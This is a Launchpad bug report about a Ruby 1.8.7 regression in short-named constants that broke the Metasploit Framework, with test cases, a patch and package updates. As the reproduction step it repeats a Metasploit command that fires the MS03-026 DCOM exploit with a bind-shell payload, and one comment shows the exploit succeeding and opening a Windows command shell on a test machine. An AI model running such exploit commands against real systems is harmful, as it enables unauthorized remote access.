Ruby 1.8 package breaks the Metasploit Framework (short-named constants)

Bug #282302 reported by HD Moore on 2008-10-12
32
This bug affects 2 people
Affects Status Importance Assigned to Milestone
ruby1.8 (Debian)
Fix Released
Unknown
ruby1.8 (Ubuntu)
Medium
Jamie Strandboge
Intrepid
Medium
Jamie Strandboge
Jaunty
Medium
Jamie Strandboge

Bug Description

Binary package hint: ruby1.8

The current stable release of the Ruby interpreter (1.8.7 in Ibix) breaks any software using short-named constants. The latest stable version from ruby-lang.org has this issue as well, but it has been fixed in the latest stable snapshot.

To summarize, this version is bad: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz

This version is corrected: ftp://ftp.ruby-lang.org/pub/ruby/stable-snapshot.tar.gz

When the bug triggers, it looks something like:
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

Since we recommend Ubuntu as a stable platform for the Metasploit Framework, we would really like to see 8.10 ship with a working version of the Ruby interpreter.

Nick Barcet (nijaba) wrote :

Thanks a lot for taking the time to report this issue and help us make Ubuntu better.
Could you please provide us with a step by step way to reproduce this issue?
Also, would you know exactly which commit fixed the problem between the 2 release?

Changed in ruby1.8:
status: New → Incomplete
Jamie Strandboge (jdstrand) wrote :

Thank you for using Ubuntu and taking the time to report a bug. I reviewed the changelog and svn log for ruby 1.8 when this report came in and again just now, but nothing jumped out at me for fixing short-named constants. Do you know which commit fixed the problem? Also, can you provide a small test case for where short-named constants fail?

I have milestoned this to be fixed in intrepid-updates after release. If the commit can be quickly found and it is not too intrusive, it might be possible to update ruby1.8 before release. Thanks for your help on this!

Changed in ruby1.8:
assignee: nobody → jdstrand
importance: Undecided → Medium
milestone: none → intrepid-updates
HD Moore (hdm-metasploit) wrote :

Sure, let me write a script that demonstrates the bug, its a little tricky because it only occurs in some convoluted Ruby objects (classes which inherit from mixins which define short-name constants, with a different base class than the class which includes them). I had a link to the Ruby patch which solved this, but need to dig it up again.

HD Moore (hdm-metasploit) wrote :

I was not able to trigger this with a standalone test case, but it is easy to reproduce using the svn version of the Metasploit Framework. The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

-HD

Jamie Strandboge (jdstrand) wrote :

Marking as Confirmed. I was able to reproduce it, but haven't found the patch yet.

Changed in ruby1.8:
status: Incomplete → Confirmed
Jamie Strandboge (jdstrand) wrote :

Thanks! The patch fixes metasploit, but does not bring the behavior back to 1.8.6 as described in the test case url that is provided. Eg:
class A
   @@a = 'A'
   def a=(x)
      @@a = x
   end
   def a
      @@a
   end
end

B = A.dup
B.new.a = 'B'

# should show 'B'
p A.new.a

The above still shows 'A' in patched 1.8.7, but is 'B' in 1.8.6.

The following:
class A
  Const = 'A'
  def foo
    p Const
  end
end

B = A.dup

class B
  Const = 'B'
end

p A::Const
A.new.foo
p B::Const
B.new.foo

This should display:
"A"
"A"
"B"
"A"

But on patched 1.8.7 I got:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
"B"

That said, unpatched 1.8.7 still shows 'A' in the first test, but the second results in:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
/tmp/35116b.rb:4:in `foo': uninitialized constant Const (NameError)
 from /tmp/35116b.rb:19

So clearly, the patch partially addresses this test case. Does the stable ruby snapshot work the same as 1.8.6 in the above test cases?

HD Moore (hdm-metasploit) wrote :

From the looks of it, even though the behavior is different between 1.8.6 and 1.8.7-patched, it was addressing an ambiguity in the first place and the 1.8.7-patched behavior should be considered correct. The 8.10 release has shipped with the broken 1.8.7 interpreter and no way for users to downgrade to 1.8.6. Any chance a new package can be pushed fairly soon for 8.10?

Jamie Strandboge (jdstrand) wrote :

Based on this information, I will prepare on SRU. Thanks for the feedback. :)

HD Moore (hdm-metasploit) wrote :

Was there any special about the 1.8.7 that was shipped with 8.10? One of our users is hitting this error, but our test case to detect the buggy version is not firing, even though it works fine for the 1.8.7 release from the ruby web site:

#
# Check for the ugly 1.8.7 short-named constants bug
#

class ConstBugTestA
        Const = 'A'
        def test
                Const == 'A'
        end
end

ConstBugTestC = ConstBugTestA.dup

class ConstBugTestB < ConstBugTestC
        Const = 'B'
end

def ruby_187_const_bug
        bugged = false

        begin
                ConstBugTestA.new.test()
                ConstBugTestB.new.test()
        rescue ::NameError
                bugged = true
        end

        bugged
end

if(ruby_187_const_bug())
        $stderr.puts ""
        $stderr.puts "***********************************************************************"
        $stderr.puts "*** *"
        $stderr.puts "*** This version of the Ruby interpreter has significant problems, we *"
        $stderr.puts "*** strongly recommend that you switch to version 1.8.6 until these *"
        $stderr.puts "*** issues have been corrected. Alternatively, you can download, *"
        $stderr.puts "*** build, and install the latest Ruby snapshot from: *"
        $stderr.puts "*** - http://www.ruby-lang.org/ *"
        $stderr.puts "*** For more information, please see the following URL: *"
        $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *"
        $stderr.puts "*** *"
        $stderr.puts "***********************************************************************"
        $stderr.puts ""
end

Jamie Strandboge (jdstrand) wrote :

Nothing special was done with the 8.10 release. When I checked svn version of metasploit on 8.10 before release, received the warning message just fine.

I'm preparing an updated version for 9.04, and will then work on the 8.10 version.

Changed in ruby1.8:
assignee: nobody → jdstrand
importance: Undecided → Medium
milestone: none → intrepid-updates
status: New → Confirmed
milestone: intrepid-updates → none
relik (dkennedy) wrote :

Any idea when these changes will be committed? Been staying away from Intrepid until changes for metasploit were implemented....

Thanks!

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu1

---------------
ruby1.8 (1.8.7.72-1ubuntu1) jaunty; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Mon, 27 Oct 2008 12:18:35 -0500

Changed in ruby1.8:
status: Confirmed → Fix Released
Jamie Strandboge (jdstrand) wrote :

Impact: this regression breaks (at least) the metasploit framework. It appears that short-named constants are not generally in wide-spread use (based on community feedback and lack of other bug reports)

Development release: applied the exact patch to 9.04 in 1.8.7.72-1ubuntu1. This is from http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=rev&revision=18485, and is already in upstream's stable snapshot. Debdiff for the upload is attached.

TEST CASE (from HD Moore):
The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

Regression potential: appears low due to the perceived infrequency of using short-named constants

Changed in ruby1.8:
status: Confirmed → In Progress
Martin Pitt (pitti) wrote :

Accepted into intrepid-proposed, please test and give feedback here. Please see https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to enable and use -proposed. Thank you in advance!

Changed in ruby1.8:
milestone: intrepid-updates → none
status: In Progress → Fix Committed
relik (dkennedy) wrote :

I can confirm that intrepid-proposed package does fix the short-named constants issue in Metasploit.

relik (dkennedy) wrote :

POC:

root@sslinuxvm12:/pentest/exploits/framework3# ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.211.55.5 E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.3:39156 -> 10.211.55.5:4444)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Jamie Strandboge (jdstrand) wrote :

$ apt-cache policy ruby1.8
ruby1.8:
  Installed: 1.8.7.72-1ubuntu0.1
  Candidate: 1.8.7.72-1ubuntu0.1
  Version table:
 *** 1.8.7.72-1ubuntu0.1 0
        500 http://archive.ubuntu.com intrepid-proposed/main Packages
        100 /var/lib/dpkg/status
     1.8.7.72-1 0
        500 http://192.168.122.1 intrepid/main Packages

Before upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

After upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Sending exploit ...
...

New version also passes (the somewhat limited) qa-regression-testing with no regressions. The build system also has a test suite that is run by default (and obviously passed).

relik (dkennedy) wrote :

Can we get this released to intrepid yet? I have it working perfectly in intrepid with intrepid-proposed... The sooner this gets pushed the better :)

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu0.1

---------------
ruby1.8 (1.8.7.72-1ubuntu0.1) intrepid-proposed; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Thu, 20 Nov 2008 13:24:03 -0600

Changed in ruby1.8:
status: Fix Committed → Fix Released
Martin Pitt (pitti) wrote :

Copied to intrepid-updates.

I have found many advices howto downgrade Ruby 1.8.7 to 1.8.6 as recommended by Rails core team.
You can found the article
http://railsgeek.com/2008/11/27/ubuntu-8-10-downgrade-ruby-1-8-7-to-1-8-6

Jamie Strandboge (jdstrand) wrote :

mikhailov,

There shouldn't be a need to downgrade as the packages are fixed. If you are continuing to have problems with 1.8.7.72-1ubuntu0.1, please report them here.

Changed in ruby1.8 (Debian):
status: Unknown → Fix Released
To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.